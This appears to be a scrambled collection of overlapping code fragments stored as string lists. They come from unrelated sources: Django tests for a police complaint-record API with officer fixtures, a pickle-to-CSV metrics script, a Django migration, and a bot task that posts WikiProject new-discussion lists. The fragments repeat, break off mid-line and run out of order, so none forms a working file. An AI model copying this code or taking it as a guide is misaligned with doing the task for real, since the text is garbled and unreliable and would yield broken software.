AllegationFactory(crid='112233') response = self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk': '112233'}), {'email': '<EMAIL>'} ) expect(response.status_code).to.eq(status.HTTP_200_OK) expect(response.data).to.eq({", "'title': 'CR document', 'file_type': 'document', 'url': 'http://cr-document.com/', 'id': '123456', } ] }) def", "last_name='Piwinicki', appointed_date=date(2001, 5, 1), complaint_percentile=4.4, trr_percentile=5.5, allegation_count=1, sustained_count=1, ) OfficerAllegationFactory( officer=officer, final_finding='SU', start_date=date(2003,", "[ { 'involved_type': 'investigator', 'officer_id': 1, 'full_name': '<NAME>', 'badge': 'CPD', 'percentile_allegation': '6.6000', 'percentile_allegation_civilian':", "allegation__is_officer_complaint=False ) investigator = InvestigatorFactory(officer=investigator) investigator_2 = InvestigatorFactory(officer=investigator_2) investigator_3 = InvestigatorFactory(officer=investigator_3) investigator_4 =", "response = self.client.get(reverse('api-v2:cr-mobile-detail', kwargs={'pk': '45678'})) expect(response.status_code).to.eq(status.HTTP_404_NOT_FOUND) @patch('cr.views.send_attachment_request_email') def test_request_document(self, mock_send_attachment_request_email): EmailTemplateFactory(type=CR_ATTACHMENT_REQUEST) AllegationFactory(crid='112233') response", "allegation=allegation) investigator = OfficerFactory( id=1, first_name='Ellis', last_name='Skol', appointed_date=date(2001, 5, 1), complaint_percentile=6.6, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8,", "document', 'file_type': 'document', 'url': 'http://cr-document.com/', 'id': '123456', } ] }) def test_retrieve_badge(self): area", "OfficerBadgeNumberFactory, VictimFactory ) from data.constants import MEDIA_TYPE_DOCUMENT from cr.tests.mixins import CRTestCaseMixin from data.cache_managers", "test_request_document(self, mock_send_attachment_request_email): EmailTemplateFactory(type=CR_ATTACHMENT_REQUEST) AllegationFactory(crid='112233') response = self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk': '112233'}), {'email': '<EMAIL>'} )", "28, tzinfo=pytz.utc), add1=3510, add2='Michigan Ave', city='Chicago', location='Police Communications System', beat=area, is_officer_complaint=False, summary='Summary', first_start_date=date(2003,", "reverse('api-v2:cr-mobile-request-document', kwargs={'pk': '112233'}), {'email': '<EMAIL>'} ) expect(response.status_code).to.eq(status.HTTP_200_OK) expect(response.data).to.eq({ 'message': 'Thanks for subscribing', 'crid':", "123, 'full_name': '<NAME>', 'rank': 'Officer', 'final_outcome': 'Separation', 'final_finding': 'Sustained', 'allegation_count': 1, 'category': 'Operation/Personnel", "allegation=allegation, investigator=investigator, current_star='123456' ) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_2, current_star=None ) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_3, current_star=None", "add2='Michigan Ave', city='Chicago', location='Police Communications System', beat=area, is_officer_complaint=False, summary='Summary', first_start_date=date(2003, 3, 20), first_end_date=date(2006,", "5, 26) ) ComplainantFactory(allegation=allegation, gender='M', race='Black', age='18') VictimFactory(allegation=allegation, gender='M', race='Black', age=53) OfficerAllegationFactory( officer=officer1,", "sustained_count=0, ) investigator_2 = OfficerFactory( id=2, first_name='Jerome', last_name='Finnigan', appointed_date=date(2001, 5, 1), complaint_percentile=6.6, civilian_allegation_percentile=7.7,", "InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_2, current_star=None ) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_3, current_star=None ) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_4,", "Employment' }, 'coaccused': [ { 'id': 123, 'full_name': '<NAME>', 'rank': 'Officer', 'final_outcome': 'Separation',", ") AttachmentFileFactory( tag='TRR', allegation=allegation, title='CR document', id='123456', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) AttachmentFileFactory( tag='TRR', allegation=allegation,", ") ) officer = OfficerFactory( id=3, first_name='Raymond', last_name='Piwinicki', appointed_date=date(2001, 5, 1), complaint_percentile=4.4, trr_percentile=5.5,", "'http://cr-document.com/', 'id': '123456', } ] }) def test_retrieve_not_found(self): response = self.client.get(reverse('api-v2:cr-mobile-detail', kwargs={'pk': '45678'}))", "cr.tests.mixins import CRTestCaseMixin from data.cache_managers import officer_cache_manager, allegation_cache_manager from email_service.constants import CR_ATTACHMENT_REQUEST from", "allegation=allegation, title='CR document', id='123456', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) AttachmentFileFactory( tag='TRR', allegation=allegation, title='CR arrest report", "ComplainantFactory(allegation=allegation, gender='M', race='Black', age='18') VictimFactory(allegation=allegation, gender='M', race='Black', age=53) OfficerAllegationFactory( officer=officer1, allegation=allegation, final_finding='SU', final_outcome='Separation',", "start_date=date(2003, 2, 28), allegation__incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), allegation__is_officer_complaint=False ) investigator = InvestigatorFactory(officer=investigator) InvestigatorAllegationFactory(", "InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_4, current_star=None ) AttachmentFileFactory( tag='TRR', allegation=allegation, title='CR document', id='123456', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT" ]
[ "return rows def save_to_csv(data, save_path): df = pd.DataFrame(data) df.to_csv(save_path) save_to_csv( convert_to_metric_first(cmap_data), \"./cmap_report_transformer.csv\" )", "import pickle from typing import DefaultDict cmap_data = pickle.load(open(\"./cmap_transformer.pkl\", \"rb\")) mm_data = pickle.load(open(\"./mm_report_transformer.pkl\",", "\"rb\")) # %% def convert_to_metric_first(data): rows = defaultdict(dict) for model, metrics in data.items():", "convert_to_metric_first(data): rows = defaultdict(dict) for model, metrics in data.items(): for metric, values in", "DefaultDict cmap_data = pickle.load(open(\"./cmap_transformer.pkl\", \"rb\")) mm_data = pickle.load(open(\"./mm_report_transformer.pkl\", \"rb\")) # %% def convert_to_metric_first(data):", "= defaultdict(dict) for model, metrics in data.items(): for metric, values in metrics.items(): for", "enumerate(values): rows[metric][model + f\"_{i}\"] = value return rows def save_to_csv(data, save_path): df =", "as pd from collections import defaultdict import pickle from typing import DefaultDict cmap_data", "%% import pandas as pd from collections import defaultdict import pickle from typing", "data.items(): for metric, values in metrics.items(): for i, value in enumerate(values): rows[metric][model +", "from typing import DefaultDict cmap_data = pickle.load(open(\"./cmap_transformer.pkl\", \"rb\")) mm_data = pickle.load(open(\"./mm_report_transformer.pkl\", \"rb\")) #", "defaultdict(dict) for model, metrics in data.items(): for metric, values in metrics.items(): for i,", "pd from collections import defaultdict import pickle from typing import DefaultDict cmap_data =", "def save_to_csv(data, save_path): df = pd.DataFrame(data) df.to_csv(save_path) save_to_csv( convert_to_metric_first(cmap_data), \"./cmap_report_transformer.csv\" ) save_to_csv(convert_to_metric_first(mm_data), \"./mm_report_transformer.csv\")", "rows def save_to_csv(data, save_path): df = pd.DataFrame(data) df.to_csv(save_path) save_to_csv( convert_to_metric_first(cmap_data), \"./cmap_report_transformer.csv\" ) save_to_csv(convert_to_metric_first(mm_data),", "metrics in data.items(): for metric, values in metrics.items(): for i, value in enumerate(values):", "pandas as pd from collections import defaultdict import pickle from typing import DefaultDict", "pickle.load(open(\"./cmap_transformer.pkl\", \"rb\")) mm_data = pickle.load(open(\"./mm_report_transformer.pkl\", \"rb\")) # %% def convert_to_metric_first(data): rows = defaultdict(dict)", "= pickle.load(open(\"./mm_report_transformer.pkl\", \"rb\")) # %% def convert_to_metric_first(data): rows = defaultdict(dict) for model, metrics", "i, value in enumerate(values): rows[metric][model + f\"_{i}\"] = value return rows def save_to_csv(data,", "for model, metrics in data.items(): for metric, values in metrics.items(): for i, value", "value in enumerate(values): rows[metric][model + f\"_{i}\"] = value return rows def save_to_csv(data, save_path):", "# %% import pandas as pd from collections import defaultdict import pickle from", "save_path): df = pd.DataFrame(data) df.to_csv(save_path) save_to_csv( convert_to_metric_first(cmap_data), \"./cmap_report_transformer.csv\" ) save_to_csv(convert_to_metric_first(mm_data), \"./mm_report_transformer.csv\") # %%", "import DefaultDict cmap_data = pickle.load(open(\"./cmap_transformer.pkl\", \"rb\")) mm_data = pickle.load(open(\"./mm_report_transformer.pkl\", \"rb\")) # %% def", "+ f\"_{i}\"] = value return rows def save_to_csv(data, save_path): df = pd.DataFrame(data) df.to_csv(save_path)", "pickle from typing import DefaultDict cmap_data = pickle.load(open(\"./cmap_transformer.pkl\", \"rb\")) mm_data = pickle.load(open(\"./mm_report_transformer.pkl\", \"rb\"))", "value return rows def save_to_csv(data, save_path): df = pd.DataFrame(data) df.to_csv(save_path) save_to_csv( convert_to_metric_first(cmap_data), \"./cmap_report_transformer.csv\"", "import pandas as pd from collections import defaultdict import pickle from typing import", "for metric, values in metrics.items(): for i, value in enumerate(values): rows[metric][model + f\"_{i}\"]", "def convert_to_metric_first(data): rows = defaultdict(dict) for model, metrics in data.items(): for metric, values", "= value return rows def save_to_csv(data, save_path): df = pd.DataFrame(data) df.to_csv(save_path) save_to_csv( convert_to_metric_first(cmap_data),", "# %% def convert_to_metric_first(data): rows = defaultdict(dict) for model, metrics in data.items(): for", "typing import DefaultDict cmap_data = pickle.load(open(\"./cmap_transformer.pkl\", \"rb\")) mm_data = pickle.load(open(\"./mm_report_transformer.pkl\", \"rb\")) # %%", "collections import defaultdict import pickle from typing import DefaultDict cmap_data = pickle.load(open(\"./cmap_transformer.pkl\", \"rb\"))", "values in metrics.items(): for i, value in enumerate(values): rows[metric][model + f\"_{i}\"] = value", "for i, value in enumerate(values): rows[metric][model + f\"_{i}\"] = value return rows def", "save_to_csv(data, save_path): df = pd.DataFrame(data) df.to_csv(save_path) save_to_csv( convert_to_metric_first(cmap_data), \"./cmap_report_transformer.csv\" ) save_to_csv(convert_to_metric_first(mm_data), \"./mm_report_transformer.csv\") #", "from collections import defaultdict import pickle from typing import DefaultDict cmap_data = pickle.load(open(\"./cmap_transformer.pkl\",", "f\"_{i}\"] = value return rows def save_to_csv(data, save_path): df = pd.DataFrame(data) df.to_csv(save_path) save_to_csv(", "= pickle.load(open(\"./cmap_transformer.pkl\", \"rb\")) mm_data = pickle.load(open(\"./mm_report_transformer.pkl\", \"rb\")) # %% def convert_to_metric_first(data): rows =", "in metrics.items(): for i, value in enumerate(values): rows[metric][model + f\"_{i}\"] = value return", "rows = defaultdict(dict) for model, metrics in data.items(): for metric, values in metrics.items():", "metrics.items(): for i, value in enumerate(values): rows[metric][model + f\"_{i}\"] = value return rows", "\"rb\")) mm_data = pickle.load(open(\"./mm_report_transformer.pkl\", \"rb\")) # %% def convert_to_metric_first(data): rows = defaultdict(dict) for", "cmap_data = pickle.load(open(\"./cmap_transformer.pkl\", \"rb\")) mm_data = pickle.load(open(\"./mm_report_transformer.pkl\", \"rb\")) # %% def convert_to_metric_first(data): rows", "rows[metric][model + f\"_{i}\"] = value return rows def save_to_csv(data, save_path): df = pd.DataFrame(data)", "%% def convert_to_metric_first(data): rows = defaultdict(dict) for model, metrics in data.items(): for metric,", "pickle.load(open(\"./mm_report_transformer.pkl\", \"rb\")) # %% def convert_to_metric_first(data): rows = defaultdict(dict) for model, metrics in", "defaultdict import pickle from typing import DefaultDict cmap_data = pickle.load(open(\"./cmap_transformer.pkl\", \"rb\")) mm_data =", "metric, values in metrics.items(): for i, value in enumerate(values): rows[metric][model + f\"_{i}\"] =", "in data.items(): for metric, values in metrics.items(): for i, value in enumerate(values): rows[metric][model", "import defaultdict import pickle from typing import DefaultDict cmap_data = pickle.load(open(\"./cmap_transformer.pkl\", \"rb\")) mm_data", "model, metrics in data.items(): for metric, values in metrics.items(): for i, value in", "mm_data = pickle.load(open(\"./mm_report_transformer.pkl\", \"rb\")) # %% def convert_to_metric_first(data): rows = defaultdict(dict) for model,", "in enumerate(values): rows[metric][model + f\"_{i}\"] = value return rows def save_to_csv(data, save_path): df" ]
[ "05:55 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('classification', '0018_auto_20210201_1004'),", "models class Migration(migrations.Migration): dependencies = [ ('classification', '0018_auto_20210201_1004'), ] operations = [ migrations.AlterField(", "[ ('classification', '0018_auto_20210201_1004'), ] operations = [ migrations.AlterField( model_name='conditiontext', name='status', field=models.CharField(choices=[('T', 'Terms Provided'),", "<reponame>SACGF/variantgrid # Generated by Django 3.1 on 2021-02-01 05:55 from django.db import migrations,", "Provided'), ('A', 'Auto-Matched'), ('N', 'Not Auto-Matched'), ('U', 'User Reviewed')], default='N', max_length=1), ), ]", "= [ migrations.AlterField( model_name='conditiontext', name='status', field=models.CharField(choices=[('T', 'Terms Provided'), ('M', 'Multiple Terms Provided'), ('A',", "class Migration(migrations.Migration): dependencies = [ ('classification', '0018_auto_20210201_1004'), ] operations = [ migrations.AlterField( model_name='conditiontext',", "'0018_auto_20210201_1004'), ] operations = [ migrations.AlterField( model_name='conditiontext', name='status', field=models.CharField(choices=[('T', 'Terms Provided'), ('M', 'Multiple", "operations = [ migrations.AlterField( model_name='conditiontext', name='status', field=models.CharField(choices=[('T', 'Terms Provided'), ('M', 'Multiple Terms Provided'),", "'Multiple Terms Provided'), ('A', 'Auto-Matched'), ('N', 'Not Auto-Matched'), ('U', 'User Reviewed')], default='N', max_length=1),", "2021-02-01 05:55 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('classification',", "3.1 on 2021-02-01 05:55 from django.db import migrations, models class Migration(migrations.Migration): dependencies =", "Generated by Django 3.1 on 2021-02-01 05:55 from django.db import migrations, models class", "on 2021-02-01 05:55 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [", "] operations = [ migrations.AlterField( model_name='conditiontext', name='status', field=models.CharField(choices=[('T', 'Terms Provided'), ('M', 'Multiple Terms", "field=models.CharField(choices=[('T', 'Terms Provided'), ('M', 'Multiple Terms Provided'), ('A', 'Auto-Matched'), ('N', 'Not Auto-Matched'), ('U',", "django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('classification', '0018_auto_20210201_1004'), ] operations", "Django 3.1 on 2021-02-01 05:55 from django.db import migrations, models class Migration(migrations.Migration): dependencies", "by Django 3.1 on 2021-02-01 05:55 from django.db import migrations, models class Migration(migrations.Migration):", "Migration(migrations.Migration): dependencies = [ ('classification', '0018_auto_20210201_1004'), ] operations = [ migrations.AlterField( model_name='conditiontext', name='status',", "= [ ('classification', '0018_auto_20210201_1004'), ] operations = [ migrations.AlterField( model_name='conditiontext', name='status', field=models.CharField(choices=[('T', 'Terms", "migrations.AlterField( model_name='conditiontext', name='status', field=models.CharField(choices=[('T', 'Terms Provided'), ('M', 'Multiple Terms Provided'), ('A', 'Auto-Matched'), ('N',", "migrations, models class Migration(migrations.Migration): dependencies = [ ('classification', '0018_auto_20210201_1004'), ] operations = [", "'Terms Provided'), ('M', 'Multiple Terms Provided'), ('A', 'Auto-Matched'), ('N', 'Not Auto-Matched'), ('U', 'User", "# Generated by Django 3.1 on 2021-02-01 05:55 from django.db import migrations, models", "import migrations, models class Migration(migrations.Migration): dependencies = [ ('classification', '0018_auto_20210201_1004'), ] operations =", "dependencies = [ ('classification', '0018_auto_20210201_1004'), ] operations = [ migrations.AlterField( model_name='conditiontext', name='status', field=models.CharField(choices=[('T',", "('M', 'Multiple Terms Provided'), ('A', 'Auto-Matched'), ('N', 'Not Auto-Matched'), ('U', 'User Reviewed')], default='N',", "('classification', '0018_auto_20210201_1004'), ] operations = [ migrations.AlterField( model_name='conditiontext', name='status', field=models.CharField(choices=[('T', 'Terms Provided'), ('M',", "model_name='conditiontext', name='status', field=models.CharField(choices=[('T', 'Terms Provided'), ('M', 'Multiple Terms Provided'), ('A', 'Auto-Matched'), ('N', 'Not", "[ migrations.AlterField( model_name='conditiontext', name='status', field=models.CharField(choices=[('T', 'Terms Provided'), ('M', 'Multiple Terms Provided'), ('A', 'Auto-Matched'),", "from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('classification', '0018_auto_20210201_1004'), ]", "name='status', field=models.CharField(choices=[('T', 'Terms Provided'), ('M', 'Multiple Terms Provided'), ('A', 'Auto-Matched'), ('N', 'Not Auto-Matched'),", "Provided'), ('M', 'Multiple Terms Provided'), ('A', 'Auto-Matched'), ('N', 'Not Auto-Matched'), ('U', 'User Reviewed')],", "Terms Provided'), ('A', 'Auto-Matched'), ('N', 'Not Auto-Matched'), ('U', 'User Reviewed')], default='N', max_length=1), )," ]
[ "name = str(section.get(0).title.strip_code()).strip() sections.add(_Section(name, timestamp)) return sections def _load_pages(self, titles): \"\"\"Load a chunk", "page.save(summary, minor=False) def _process(self, project, updated): \"\"\"Process new discussions for the given project.\"\"\"", "\"{{WPX new discussion|color={{{1|#37f}}}|title=%(title)s|section=%(name)s|timestamp=%(timestamp)s}}\" discitems = [ template % { \"title\": disc.title, \"name\": disc.name,", "(ns, title) in cursor.fetchall()] self._logger.debug(\"Fetching sections for %s pages\", len(titles)) sections = {}", "a list of section tuples for the given page.\"\"\" code = mwparserfromhell.parse(text) sections", "tuples. The only pages included in the dict are those that have been", "15 DISCUSSIONS_BEFORE_FOLD = 4 @staticmethod def _parse_timestamp(text): \"\"\"Return a datetime for the given", "if disc.title not in current][:3] return discussions, news def _save_discussions(self, project, title, discussions,", "updated between %s and %s\", startts, endts) with self._bot.wikidb as cursor: cursor.execute(query, (startts,", "Given a WikiProject new discussions page, return all discussions currently listed. \"\"\" text", "dict mapping talk page titles to lists of section tuples. The only pages", "datetime import re from reportsbot.task import Task from reportsbot.util import join_full_title import mwparserfromhell", "OR rc_type = 1 OR rc_type = 3) AND rc_bot = 0\"\"\" startts", "self._bot.wikidb as cursor: cursor.execute(query, (startts, endts)) titles = [join_full_title(self._bot.site, ns, title.decode(\"utf8\")) for (ns,", "rc_type = 1 OR rc_type = 3) AND rc_bot = 0\"\"\" startts =", "= req.submit() return [(page[\"title\"], _get_rev(page)) for page in data[\"query\"][\"pages\"]] def _get_updated_discussions(self, start, end):", "tmpl.has(\"timestamp\")): continue try: timestamp = self._parse_timestamp(tmpl.get(\"timestamp\").value) except ValueError: continue title = str(tmpl.get(\"title\").value) section", "%s pages\", len(titles)) sections = {} chunksize = 50 for start in range(0,", "title.\"\"\" text = \"\"\"<noinclude><div style=\"padding-bottom:1em;\">{{Clickable button 2|%(projname)s|Return to WikiProject|class=mw-ui-neutral}}</div></noinclude> {{WPX action box|color={{{2|#086}}}|title=Have a", "import namedtuple from datetime import datetime import re from reportsbot.task import Task from", "%s\", startts, endts) with self._bot.wikidb as cursor: cursor.execute(query, (startts, endts)) titles = [join_full_title(self._bot.site,", "str(section.get(0).title.strip_code()).strip() sections.add(_Section(name, timestamp)) return sections def _load_pages(self, titles): \"\"\"Load a chunk of pages", "if title in updated: sections[title] = updated[title] elif title in current: sections[title] =", "current[title] discussions = [_Discussion(title, section.name, section.timestamp) for title in sections for section in", "= self._process_discussions(pages, current, updated) self._save_discussions(project, title, discussions, news) def run(self): start = self._bot.get_last_updated(\"new_discussions\")", "timestamp string, or ValueError.\"\"\" return datetime.strptime(str(text), \"%H:%M, %d %B %Y (UTC)\") def _extract_sections(self,", "= current[title] discussions = [_Discussion(title, section.name, section.timestamp) for title in sections for section", "new discussions within a WikiProject's scope Copyright (C) 2015 <NAME>, 2016 <NAME> Licensed", "disc in discussions] fold = self.DISCUSSIONS_BEFORE_FOLD if len(discitems) > fold: before = \"\\n\".join(discitems[:fold])", "AND (rc_type = 0 OR rc_type = 1 OR rc_type = 3) AND", "page.\"\"\" code = mwparserfromhell.parse(text) sections = set() for section in code.get_sections(levels=[2]): clean =", "if len(discitems) > fold: before = \"\\n\".join(discitems[:fold]) after = \"\\n\".join(discitems[fold:]) disclist = before", "disc.title not in current][:3] return discussions, news def _save_discussions(self, project, title, discussions, news):", "project.name, \"projtalk\": projtalk, \"discussions\": disclist } summary = \"Updating new discussions\" if news:", "tmpl.name != self.DISCUSSION_TEMPLATE: continue if not (tmpl.has(\"title\") and tmpl.has(\"section\") and tmpl.has(\"timestamp\")): continue try:", "namedtuple from datetime import datetime import re from reportsbot.task import Task from reportsbot.util", "Request __all__ = [\"NewDiscussions\"] _Section = namedtuple(\"_Section\", [\"name\", \"timestamp\"]) _Discussion = namedtuple(\"_Discussion\", [\"title\",", "_load_pages(self, titles): \"\"\"Load a chunk of pages from the API.\"\"\" def _get_rev(page): try:", "DISCUSSION_TEMPLATE = \"WPX new discussion\" DISCUSSIONS_PER_PAGE = 15 DISCUSSIONS_BEFORE_FOLD = 4 @staticmethod def", "talk page titles to lists of section tuples. The only pages included in", "disclist } summary = \"Updating new discussions\" if news: summary += \": \"", "+ \"/Discussions\" pages = project.get_members() current = self._get_current_discussions(title) discussions, news = self._process_discussions(pages, current,", "the API.\"\"\" def _get_rev(page): try: return page[\"revisions\"][0][\"slots\"][\"main\"][\"content\"] except (KeyError, IndexError): return \"\" req", "discussions] fold = self.DISCUSSIONS_BEFORE_FOLD if len(discitems) > fold: before = \"\\n\".join(discitems[:fold]) after =", "project.name + \"/Discussions\" pages = project.get_members() current = self._get_current_discussions(title) discussions, news = self._process_discussions(pages,", "within a WikiProject's scope Copyright (C) 2015 <NAME>, 2016 <NAME> Licensed under MIT", "import re from reportsbot.task import Task from reportsbot.util import join_full_title import mwparserfromhell from", "self._logger.debug(\"Updating new discussions for %s\", project.name) title = project.name + \"/Discussions\" pages =", "for start in range(0, len(titles), chunksize): chunk = titles[start:start+chunksize] pages = self._load_pages(chunk) for", "code = mwparserfromhell.parse(text) discussions = {} for tmpl in code.filter_templates(): if tmpl.name !=", "reportsbot.task import Task from reportsbot.util import join_full_title import mwparserfromhell from pywikibot.data.api import Request", "%s\", project.name) title = project.name + \"/Discussions\" pages = project.get_members() current = self._get_current_discussions(title)", "import Task from reportsbot.util import join_full_title import mwparserfromhell from pywikibot.data.api import Request __all__", "= updated[title] elif title in current: sections[title] = current[title] discussions = [_Discussion(title, section.name,", "current: sections[title] = current[title] discussions = [_Discussion(title, section.name, section.timestamp) for title in sections", "disclist = before + \"<noinclude>\\n\" + after + \"</noinclude>\" else: disclist = \"\\n\".join(discitems)", "= \"Updating new discussions\" if news: summary += \": \" + \", \".join(\"[[%s]]\"", "Task from reportsbot.util import join_full_title import mwparserfromhell from pywikibot.data.api import Request __all__ =", "given project.\"\"\" self._logger.debug(\"Updating new discussions for %s\", project.name) title = project.name + \"/Discussions\"", "License: http://mitlicense.org \"\"\" from collections import namedtuple from datetime import datetime import re", "clean) if not match: continue try: timestamp = self._parse_timestamp(match.group(0)) except ValueError: continue name", "reportsbot.util import join_full_title import mwparserfromhell from pywikibot.data.api import Request __all__ = [\"NewDiscussions\"] _Section", "= 50 for start in range(0, len(titles), chunksize): chunk = titles[start:start+chunksize] pages =", "_Discussion = namedtuple(\"_Discussion\", [\"title\", \"name\", \"timestamp\"]) class NewDiscussions(Task): \"\"\"Updates a list of new", "discussion|color={{{1|#37f}}}|title=%(title)s|section=%(name)s|timestamp=%(timestamp)s}}\" discitems = [ template % { \"title\": disc.title, \"name\": disc.name, \"timestamp\": disc.timestamp.strftime(\"%H:%M,", "\"action\": \"query\", \"prop\": \"revisions\", \"rvprop\": \"content\", \"rvslots\": \"main\", \"formatversion\": \"2\", \"titles\": \"|\".join(titles) })", "class NewDiscussions(Task): \"\"\"Updates a list of new discussions within a WikiProject's scope.\"\"\" DISCUSSION_TEMPLATE", "discussions currently listed. \"\"\" text = self._bot.get_page(title).text code = mwparserfromhell.parse(text) discussions = {}", "self._parse_timestamp(match.group(0)) except ValueError: continue name = str(section.get(0).title.strip_code()).strip() sections.add(_Section(name, timestamp)) return sections def _load_pages(self,", "page title.\"\"\" text = \"\"\"<noinclude><div style=\"padding-bottom:1em;\">{{Clickable button 2|%(projname)s|Return to WikiProject|class=mw-ui-neutral}}</div></noinclude> {{WPX action box|color={{{2|#086}}}|title=Have", "sorted list of the most recent discussion tuples.\"\"\" sections = {} for page", "page in pages: title = join_full_title(self._bot.site, page.ns + 1, page.title) if title in", "disc.name, disc.timestamp.strftime(\"%Y %m %d, %H:%M:%S\")) news = [disc.title for disc in discussions if", "list of section tuples for the given page.\"\"\" code = mwparserfromhell.parse(text) sections =", "section.strip_code() match = re.search(r\"\\d\\d:\\d\\d,\\s\\d\\d?\\s\\w+\\s\\d{4}\\s\\(UTC\\)\", clean) if not match: continue try: timestamp = self._parse_timestamp(match.group(0))", "disc.timestamp, reverse=True) discussions = discussions[:self.DISCUSSIONS_PER_PAGE] for disc in discussions: self._logger.debug(\" [[%s#%s]] at %s\",", "pages = project.get_members() current = self._get_current_discussions(title) discussions, news = self._process_discussions(pages, current, updated) self._save_discussions(project,", "len(discitems) > fold: before = \"\\n\".join(discitems[:fold]) after = \"\\n\".join(discitems[fold:]) disclist = before +", "= 15 DISCUSSIONS_BEFORE_FOLD = 4 @staticmethod def _parse_timestamp(text): \"\"\"Return a datetime for the", "talk page titles to lists of section tuples. Given a WikiProject new discussions", "? AND rc_timestamp < ? AND rc_namespace % 2 = 1 AND rc_namespace", "page in data[\"query\"][\"pages\"]] def _get_updated_discussions(self, start, end): \"\"\"Return a dict mapping talk page", "\"name\", \"timestamp\"]) class NewDiscussions(Task): \"\"\"Updates a list of new discussions within a WikiProject's", "collections import namedtuple from datetime import datetime import re from reportsbot.task import Task", "page = self._bot.get_page(title) page.text = text % { \"title\": title, \"projname\": project.name, \"projtalk\":", "pages from the API.\"\"\" def _get_rev(page): try: return page[\"revisions\"][0][\"slots\"][\"main\"][\"content\"] except (KeyError, IndexError): return", "title in discussions: discussions[title].add(section) else: discussions[title] = {section} return discussions def _process_discussions(self, pages,", "list of new discussions within a WikiProject's scope Copyright (C) 2015 <NAME>, 2016", "discussions within a WikiProject's scope Copyright (C) 2015 <NAME>, 2016 <NAME> Licensed under", "self.DISCUSSIONS_BEFORE_FOLD if len(discitems) > fold: before = \"\\n\".join(discitems[:fold]) after = \"\\n\".join(discitems[fold:]) disclist =", "current = self._get_current_discussions(title) discussions, news = self._process_discussions(pages, current, updated) self._save_discussions(project, title, discussions, news)", "= 4 @staticmethod def _parse_timestamp(text): \"\"\"Return a datetime for the given timestamp string,", "title) in cursor.fetchall()] self._logger.debug(\"Fetching sections for %s pages\", len(titles)) sections = {} chunksize", "\"\"\"Return a dict mapping talk page titles to lists of section tuples. Given", "new discussions within a WikiProject's scope.\"\"\" DISCUSSION_TEMPLATE = \"WPX new discussion\" DISCUSSIONS_PER_PAGE =", "in data[\"query\"][\"pages\"]] def _get_updated_discussions(self, start, end): \"\"\"Return a dict mapping talk page titles", "+ after + \"</noinclude>\" else: disclist = \"\\n\".join(discitems) projtalk = self._bot.get_page(project.name).toggleTalkPage().title() page =", "cursor.execute(query, (startts, endts)) titles = [join_full_title(self._bot.site, ns, title.decode(\"utf8\")) for (ns, title) in cursor.fetchall()]", "{ \"title\": title, \"projname\": project.name, \"projtalk\": projtalk, \"discussions\": disclist } summary = \"Updating", "\"titles\": \"|\".join(titles) }) data = req.submit() return [(page[\"title\"], _get_rev(page)) for page in data[\"query\"][\"pages\"]]", "\"rvslots\": \"main\", \"formatversion\": \"2\", \"titles\": \"|\".join(titles) }) data = req.submit() return [(page[\"title\"], _get_rev(page))", "WikiProject|class=mw-ui-neutral}}</div></noinclude> {{WPX action box|color={{{2|#086}}}|title=Have a question?|content= {{Clickable button 2|url={{fullurl:%(projtalk)s|action=edit&section=new}}|Ask the WikiProject|class=mw-ui-progressive mw-ui-block}} {{Clickable", "code.get_sections(levels=[2]): clean = section.strip_code() match = re.search(r\"\\d\\d:\\d\\d,\\s\\d\\d?\\s\\w+\\s\\d{4}\\s\\(UTC\\)\", clean) if not match: continue try:", "box|color={{{2|#086}}}|title=Have a question?|content= {{Clickable button 2|url={{fullurl:%(projtalk)s|action=edit&section=new}}|Ask the WikiProject|class=mw-ui-progressive mw-ui-block}} {{Clickable button 2|%(projtalk)s|View Other", "question?|content= {{Clickable button 2|url={{fullurl:%(projtalk)s|action=edit&section=new}}|Ask the WikiProject|class=mw-ui-progressive mw-ui-block}} {{Clickable button 2|%(projtalk)s|View Other Discussions|class=mw-ui-block}} }}", "= 0 OR rc_type = 1 OR rc_type = 3) AND rc_bot =", "self._load_pages(chunk) for title, text in pages: try: sections[title] = self._extract_sections(text) except mwparserfromhell.parser.ParserError: self._logger.exception(\"Failed", "scope Copyright (C) 2015 <NAME>, 2016 <NAME> Licensed under MIT License: http://mitlicense.org \"\"\"", "= 1 AND rc_namespace != 3 AND (rc_type = 0 OR rc_type =", "project.get_members() current = self._get_current_discussions(title) discussions, news = self._process_discussions(pages, current, updated) self._save_discussions(project, title, discussions,", "= self._get_updated_discussions(start, end) self._logger.info(\"Updating discussion reports\") for project in self._bot.get_configured_projects(): if project.config.get(\"new_discussions\"): self._process(project,", "for page in data[\"query\"][\"pages\"]] def _get_updated_discussions(self, start, end): \"\"\"Return a dict mapping talk", "listed. \"\"\" text = self._bot.get_page(title).text code = mwparserfromhell.parse(text) discussions = {} for tmpl", "\"\"\"Return a dict mapping talk page titles to lists of section tuples. The", "title in current: sections[title] = current[title] discussions = [_Discussion(title, section.name, section.timestamp) for title", "[disc.title for disc in discussions if disc.title not in current][:3] return discussions, news", "chunk of pages from the API.\"\"\" def _get_rev(page): try: return page[\"revisions\"][0][\"slots\"][\"main\"][\"content\"] except (KeyError,", "(rc_type = 0 OR rc_type = 1 OR rc_type = 3) AND rc_bot", "!= self.DISCUSSION_TEMPLATE: continue if not (tmpl.has(\"title\") and tmpl.has(\"section\") and tmpl.has(\"timestamp\")): continue try: timestamp", "section in code.get_sections(levels=[2]): clean = section.strip_code() match = re.search(r\"\\d\\d:\\d\\d,\\s\\d\\d?\\s\\w+\\s\\d{4}\\s\\(UTC\\)\", clean) if not match:", "%B %Y (UTC)\") } for disc in discussions] fold = self.DISCUSSIONS_BEFORE_FOLD if len(discitems)", "= datetime.utcnow() updated = self._get_updated_discussions(start, end) self._logger.info(\"Updating discussion 